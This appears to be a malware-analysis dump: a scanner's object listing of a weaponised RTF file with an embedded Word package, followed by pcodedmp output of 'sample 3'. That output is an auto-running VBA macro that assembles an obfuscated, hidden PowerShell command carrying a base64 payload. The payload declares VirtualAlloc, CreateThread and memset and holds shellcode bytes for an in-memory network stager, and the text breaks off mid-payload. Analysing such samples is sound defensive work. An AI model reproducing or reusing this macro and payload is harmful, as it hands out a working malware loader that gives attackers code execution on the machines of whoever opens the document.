                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX36.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX37.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX38.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX39.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX4.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX40.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX5.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX6.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX7.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX8.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",299,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX9.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX1.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX10.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX11.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX12.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX13.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX14.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX15.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX16.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX17.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX18.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX19.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX2.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX20.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX21.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX22.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX23.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX24.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX25.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX26.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX27.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX28.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX29.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX3.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX30.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX31.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX32.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX33.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX34.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX35.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX36.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX37.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX38.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX39.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX4.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX40.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX5.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX6.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX7.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX8.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX9.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",12878,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/document.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",1261,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/fontTable.xml")
                           -ScanObject("ARCHIVE_FS" (0:"UNKNOWN",222,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/media/image1.wmf")
                           -ScanObject("ARCHIVE_FS" (5:"XML",2519,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/settings.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",28676,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/styles.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",6795,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/theme/theme1.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",497,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/webSettings.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",6537,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/_rels/document.xml.rels")
                           -CouldNotScanObject("ARCHIVE_FS","[Content_Types].xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",590,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|_rels/.rels")
                     -ScanObject("OLE2_FS" (0:"UNKNOWN",6,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/.ObjInfo")
       -ScanObject("GENERIC_FS" (21:"TEXT",32,"d9fac68b6c49c485675d9141f375799d10572999|objclass_2")
       -ScanObject("GENERIC_FS" (0:"UNKNOWN",45,"d9fac68b6c49c485675d9141f375799d10572999|objdata_3")
       -ScanObject("GENERIC_FS" (21:"TEXT",38,"d9fac68b6c49c485675d9141f375799d10572999|oleclsid_4")
       -ScanObject("GENERIC_FS" (32:"OLEOBJ",1592,"d9fac68b6c49c485675d9141f375799d10572999|datastore_5")
              -ScanObject("MEM_FS" (1:"OLE2",1536,"d9fac68b6c49c485675d9141f375799d10572999|datastore_5|RTFOLEOBJECT|msxml2.saxxmlreader.5.0")
       -ScanObject("GENERIC_FS" (21:"TEXT",2521,"d9fac68b6c49c485675d9141f375799d10572999|lsdlockedexcept_6")
       -ScanObject("GENERIC_FS" (31:"HEX",628,"d9fac68b6c49c485675d9141f375799d10572999|colorschememapping_7")
              -ScanObject("MEM_FS" (5:"XML",314,"d9fac68b6c49c485675d9141f375799d10572999|colorschememapping_7|HEX")
       -ScanObject("GENERIC_FS" (31:"HEX",6162,"d9fac68b6c49c485675d9141f375799d10572999|themedata_8")
              -ScanObject("MEM_FS" (7:"ZIP",3081,"d9fac68b6c49c485675d9141f375799d10572999|themedata_8|HEX")
                     -CouldNotScanObject("ARCHIVE_FS","[Content_Types].xml")
                     -ScanObject("ARCHIVE_FS" (5:"XML",310,"d9fac68b6c49c485675d9141f375799d10572999|themedata_8|HEX|_rels/.rels")
                     -ScanObject("ARCHIVE_FS" (5:"XML",138,"d9fac68b6c49c485675d9141f375799d10572999|themedata_8|HEX|theme/theme/themeManager.xml")
                     -ScanObject("ARCHIVE_FS" (5:"XML",6992,"d9fac68b6c49c485675d9141f375799d10572999|themedata_8|HEX|theme/theme/theme1.xml")
                     -ScanObject("ARCHIVE_FS" (5:"XML",283,"d9fac68b6c49c485675d9141f375799d10572999|themedata_8|HEX|theme/theme/_rels/themeManager.xml.rels")
       -ScanObject("GENERIC_FS" (21:"TEXT",1060,"d9fac68b6c49c485675d9141f375799d10572999|dptxbxtext_9")
       -ScanObject("GENERIC_FS" (21:"TEXT",1060,"d9fac68b6c49c485675d9141f375799d10572999|shptxt_10")
       -ScanObject("GENERIC_FS" (31:"HEX",244,"d9fac68b6c49c485675d9141f375799d10572999|sv_11")
              -ScanObject("MEM_FS" (0:"UNKNOWN",122,"d9fac68b6c49c485675d9141f375799d10572999|sv_11|HEX")
       -ScanObject("GENERIC_FS" (27:"BASE64",570,"d9fac68b6c49c485675d9141f375799d10572999|sn_12")
              -ScanObject("MEM_FS" (0:"UNKNOWN",426,"d9fac68b6c49c485675d9141f375799d10572999|sn_12|B64")
       -ScanObject("GENERIC_FS" (21:"TEXT",5,"d9fac68b6c49c485675d9141f375799d10572999|pntxtb_13")
       -ScanObject("GENERIC_FS" (21:"TEXT",9,"d9fac68b6c49c485675d9141f375799d10572999|pntxta_14")
       -ScanObject("GENERIC_FS" (31:"HEX",4,"d9fac68b6c49c485675d9141f375799d10572999|wgrffmtfilter_15")
              -ScanObject("MEM_FS" (21:"TEXT",2,"d9fac68b6c49c485675d9141f375799d10572999|wgrffmtfilter_15|HEX")
       -ScanObject("GENERIC_FS" (21:"TEXT",52,"d9fac68b6c49c485675d9141f375799d10572999|xmlnstbl_16")
       -ScanObject("GENERIC_FS" (27:"BASE64",12,"d9fac68b6c49c485675d9141f375799d10572999|operator_17")
              -ScanObject("MEM_FS" (0:"UNKNOWN",6,"d9fac68b6c49c485675d9141f375799d10572999|operator_17|B64")
       -ScanObject("GENERIC_FS" (27:"BASE64",12,"d9fac68b6c49c485675d9141f375799d10572999|author_18")
              -ScanObject("MEM_FS" (0:"UNKNOWN",6,"d9fac68b6c49c485675d9141f375799d10572999|author_18|B64")
       -ScanObject("GENERIC_FS" (21:"TEXT",43,"d9fac68b6c49c485675d9141f375799d10572999|stylesheet_19")
       -ScanObject("GENERIC_FS" (21:"TEXT",17,"d9fac68b6c49c485675d9141f375799d10572999|colortbl_20")
       -ScanObject("GENERIC_FS" (27:"BASE64",36,"d9fac68b6c49c485675d9141f375799d10572999|falt_21")
              -ScanObject("MEM_FS" (0:"UNKNOWN",27,"d9fac68b6c49c485675d9141f375799d10572999|falt_21|B64")
       -ScanObject("GENERIC_FS" (31:"HEX",280,"d9fac68b6c49c485675d9141f375799d10572999|panose_22")
              -ScanObject("MEM_FS" (0:"UNKNOWN",140,"d9fac68b6c49c485675d9141f375799d10572999|panose_22|HEX")
       -ScanObject("GENERIC_FS" (0:"UNKNOWN",1618,"d9fac68b6c49c485675d9141f375799d10572999|fonttbl_23")
       -ScanObject("GENERIC_FS" (21:"TEXT",4167,"d9fac68b6c49c485675d9141f375799d10572999|rtf_24")

Full pcodedmp output  of sample 3:

Macros/VBA/ThisDocument - 10363 bytes
Line #0:
       FuncDefn (Sub Auto_Open())
Line #1:
       Dim
       VarDefn omVsI
Line #2:
       LineCont 0x0028 19 00 00 00 1B 00 00 00 1D 00 00 00 1F 00 00 00 21 00 00 00 23 00 00 00 25 00 00 00 27 00 00 00 29 00 00 00 2B 00 00 00
       LitStr 0x0063 " /w 1 /C "s''v Td -;s''v QYI e''c;s''v HI ((g''v Td).value.toString()+(g''v QYI).value.toString());"
       LitStr 0x0001 "p"
       Concat
       LitStr 0x0001 "o"
       Concat
       LitStr 0x0001 "w"
       Concat
       LitStr 0x0001 "e"
       Concat
       LitStr 0x0001 "r"
       Concat
       LitStr 0x0001 "s"
       Concat
       LitStr 0x0001 "h"
       Concat
       LitStr 0x0001 "e"
       Concat
       LitStr 0x0001 "l"
       Concat
       LitStr 0x0001 "l"
       Concat
       LitStr 0x02A9 " (g''v HI).value.toString() ('JABmAE4AIAA9ACAAJwAkAEIAQgBmACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB"
       Concat
       LitStr 0x0320 "0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAVABJACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAQgBCAGYAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQB"
       Concat
       LitStr 0x0320 "dADsAWwBCAHkAdABlAFsAXQBdACQARwB0ACAAPQAgADAAeABlADgALAAwAHgAOAAyACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAMAAsADAAeAA4ADkALAAwAHgAZQA1ACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgANgA0ACwAMAB4ADgAYgAsADAAeAA1ADAALAAwAHgAMwAwACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMABjACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQA0ACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeABiADcALAAwAHgANABhACwAMAB4ADIANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeAAzAGMALAAwAHgANgAxACwAMAB4ADcAYwAsADAAeAAwADIALAAwAHgAMgBjACwAMAB4ADIAMAAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4AGUAMgAsADAAeABmADIALAAwAHgANQAyACwAMAB4ADUANwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEAMAAsADAAeAA4AGIALAAwAHgANABhACwAMAB4ADMAYwAsADAAeAA4AGIALAAwAHgANABjACwAMAB4ADEAMQAsADAAeAA3ADgALAAwAHgAZQAzACwAMAB4ADQAOAA"
       Concat
       LitStr 0x0320 "sADAAeAAwADEALAAwAHgAZAAxACwAMAB4ADUAMQAsADAAeAA4AGIALAAwAHgANQA5ACwAMAB4ADIAMAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAA0ADkALAAwAHgAMQA4ACwAMAB4AGUAMwAsADAAeAAzAGEALAAwAHgANAA5ACwAMAB4ADgAYgAsADAAeAAzADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADYALAAwAHgAMwAxACwAMAB4AGYAZgAsADAAeABhAGMALAAwAHgAYwAxACwAMAB4AGMAZgAsADAAeAAwAGQALAAwAHgAMAAxACwAMAB4AGMANwAsADAAeAAzADgALAAwAHgAZQAwACwAMAB4ADcANQAsADAAeABmADYALAAwAHgAMAAzACwAMAB4ADcAZAAsADAAeABmADgALAAwAHgAMwBiACwAMAB4ADcAZAAsADAAeAAyADQALAAwAHgANwA1ACwAMAB4AGUANAAsADAAeAA1ADgALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAyADQALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA2ADYALAAwAHgAOABiACwAMAB4ADAAYwAsADAAeAA0AGIALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAxAGMALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA4AGIALAAwAHgAMAA0ACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAOQA"
       Concat
       LitStr 0x0320 "sADAAeAA0ADQALAAwAHgAMgA0ACwAMAB4ADIANAAsADAAeAA1AGIALAAwAHgANQBiACwAMAB4ADYAMQAsADAAeAA1ADkALAAwAHgANQBhACwAMAB4ADUAMQAsADAAeABmAGYALAAwAHgAZQAwACwAMAB4ADUAZgAsADAAeAA1AGYALAAwAHgANQBhACwAMAB4ADgAYgAsADAAeAAxADIALAAwAHgAZQBiACwAMAB4ADgAZAAsADAAeAA1AGQALAAwAHgANgA4ACwAMAB4ADYAZQAsADAAeAA2ADUALAAwAHgANwA0ACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANwA3ACwAMAB4ADYAOQAsADAAeAA2AGUALAAwAHgANgA5ACwAMAB4ADUANAAsADAAeAA2ADgALAAwAHgANABjACwAMAB4ADcANwAsADAAeAAyADYALAAwAHgAMAA3ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAMwAxACwAMAB4AGQAYgAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAAzAGEALAAwAHgANQA2ACwAMAB4ADcAOQAsADAAeABhADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADYAYQAsADAAeAAwADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAYgBiACwAMAB4ADAAMQA"
       Concat
       LitStr 0x0320 "sADAAeAAwADAALAAwAHgAMAAwACwAMAB4AGUAOAAsADAAeABiADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMgBmACwAMAB4ADQAYQAsADAAeAA2ADEALAAwAHgANQA4ACwAMAB4ADQAZgAsADAAeAA1ADUALAAwAHgAMwAzACwAMAB4ADUANQAsADAAeAAzADYALAAwAHgANQA3ACwAMAB4ADYANgAsADAAeAA1ADMALAAwAHgANgA0ACwAMAB4ADQAOQAsADAAeAA0AGEALAAwAHgANwA3ACwAMAB4ADYAOAAsADAAeAA3ADcALAAwAHgANgA2ACwAMAB4ADUANAAsADAAeAA2AGQALAAwAHgAMwAwACwAMAB4ADYANwAsADAAeAAzADcALAAwAHgANwAzACwAMAB4ADQANQAsADAAeAAzADMALAAwAHgANAAxACwAMAB4ADQAMQAsADAAeAAzADgALAAwAHgAMAAwACwAMAB4ADUAMAAsADAAeAA2ADgALAAwAHgANQA3ACwAMAB4ADgAOQAsADAAeAA5AGYALAAwAHgAYwA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOAA5ACwAMAB4AGMANgAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAzADIALAAwAHgAZQAwACwAMAB4ADgANAAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1'+'ADcALAAwAHgANQAzACwAMAB4ADUA"
       Concat
       LitStr 0x0320 "NgAsADAAeAA2ADgALAAwAHgAZQBiACwAMAB4ADUANQAsADAAeAAyAGUALAAwAHgAMwBiACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQA2ACwAMAB4ADYAYQAsADAAeAAwAGEALAAwAHgANQBmACwAMAB4ADYAOAAsADAAeAA4ADAALAAwAHgAMwAzACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAOAA5ACwAMAB4AGUAMAAsADAAeAA2AGEALAAwAHgAMAA0ACwAMAB4ADUAMAAsADAAeAA2AGEALAAwAHgAMQBmACwAMAB4ADUANgAsADAAeAA2ADgALAAwAHgANwA1ACwAMAB4ADQANgAsADAAeAA5AGUALAAwAHgAOAA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUANgAsADAAeAA2ADgALAAwAHgAMgBkACwAMAB4ADAANgAsADAAeAAxADgALAAwAHgANwBiACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAMQA2ACwAMAB4ADYAOAAsADAAeAA4ADgALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADQANAAsADAAeABmADAALAAwAHgAMwA1ACwAMAB4AGUAMAAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADQA"
       Concat
